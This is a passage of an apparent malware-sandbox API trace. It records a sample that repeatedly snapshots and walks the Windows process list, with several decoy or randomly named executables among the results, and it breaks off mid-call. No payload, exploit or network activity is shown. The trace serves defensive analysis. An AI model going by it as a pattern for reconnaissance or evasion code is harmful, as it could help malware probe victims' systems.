[0144.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0144.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.072] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.074] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0144.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0144.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0144.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0144.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0144.088] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0144.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0144.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0144.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0144.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0144.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0144.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0144.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0144.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0144.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0144.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0144.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0144.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0144.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0144.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0144.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0144.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0144.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0144.127] CloseHandle (hObject=0xbc) returned 1 [0144.127] Sleep (dwMilliseconds=0x12c) [0144.443] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0144.448] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.449] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0144.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0144.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.457] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.457] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.458] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.460] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.461] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.462] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.463] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0144.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0144.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0144.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0144.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0144.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0144.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0144.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0144.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0144.478] Process32NextW (in: hSnapshot=0xc4, 